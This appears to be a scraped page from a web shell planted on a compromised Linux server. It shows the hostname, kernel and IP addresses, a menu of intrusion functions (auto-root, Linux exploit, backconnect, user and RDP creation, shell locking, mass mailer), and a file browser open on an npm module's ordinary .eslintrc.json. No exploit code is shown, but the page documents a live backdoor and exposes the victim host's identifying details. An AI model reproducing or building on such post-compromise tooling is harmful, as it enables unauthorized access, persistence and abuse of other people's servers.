Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
node_modules /
npm /
node_modules /
color-name /
[ HOME SHELL ]
Name
Size
Permission
Action
.eslintrc.json
1.13
KB
-rw-r--r--
.npmignore
1.25
KB
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
373
B
-rw-r--r--
index.js
4.36
KB
-rw-r--r--
package.json
1.32
KB
-rw-r--r--
test.js
164
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .eslintrc.json
{ "env": { "browser": true, "node": true, "commonjs": true, "es6": true }, "extends": "eslint:recommended", "rules": { "strict": 2, "indent": 0, "linebreak-style": 0, "quotes": 0, "semi": 0, "no-cond-assign": 1, "no-constant-condition": 1, "no-duplicate-case": 1, "no-empty": 1, "no-ex-assign": 1, "no-extra-boolean-cast": 1, "no-extra-semi": 1, "no-fallthrough": 1, "no-func-assign": 1, "no-global-assign": 1, "no-implicit-globals": 2, "no-inner-declarations": ["error", "functions"], "no-irregular-whitespace": 2, "no-loop-func": 1, "no-multi-str": 1, "no-mixed-spaces-and-tabs": 1, "no-proto": 1, "no-sequences": 1, "no-throw-literal": 1, "no-unmodified-loop-condition": 1, "no-useless-call": 1, "no-void": 1, "no-with": 2, "wrap-iife": 1, "no-redeclare": 1, "no-unused-vars": ["error", { "vars": "all", "args": "none" }], "no-sparse-arrays": 1 } }
Close